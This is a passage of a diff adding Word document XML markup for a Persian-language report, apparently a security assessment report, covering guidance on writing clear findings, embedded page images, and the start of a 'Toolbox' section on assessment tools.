+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>سک</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> و ارزش تاث</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ر</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">هر </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>یافته ای</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> با</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>د</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>واضح</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> و مختصر باشد و</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> باید </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">خواننده </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ی </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ا</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ن</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> گزارش</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> درک کامل</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> از مسئله در دست داشته باشد. صفحات بعد</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> گزارش جدول را نشان م</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> دهند.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:pict>
+          <v:shape id="_x0000_i1028" type="#_x0000_t75" style="width:467.7pt;height:437pt">
+            <v:imagedata r:id="rId9" o:title="5_333"/>
+          </v:shape>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:pict>
+          <v:shape id="_x0000_i1029" type="#_x0000_t75" style="width:467.35pt;height:571.95pt">
+            <v:imagedata r:id="rId10" o:title="6_334"/>
+          </v:shape>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:pict>
+          <v:shape id="_x0000_i1030" type="#_x0000_t75" style="width:467.35pt;height:564.75pt">
+            <v:imagedata r:id="rId11" o:title="7_335"/>
+          </v:shape>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:pict>
+          <v:shape id="_x0000_i1031" type="#_x0000_t75" style="width:467.35pt;height:184.4pt">
+            <v:imagedata r:id="rId12" o:title="8_336"/>
+          </v:shape>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>IV</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> جعبه ابزار </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ا</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ن</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> بخش اغلب برا</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> توص</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ف</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ابزار تجار</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> و متن باز که در انجام ارز</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>اب</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> مورد استفاده قرار م</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> گ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>رد</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> استفاده م</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> شود. هنگام</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> که اسکر</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>پت</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ها</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> سفارش</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> / کد در ح</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ن</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ارز</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>اب</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
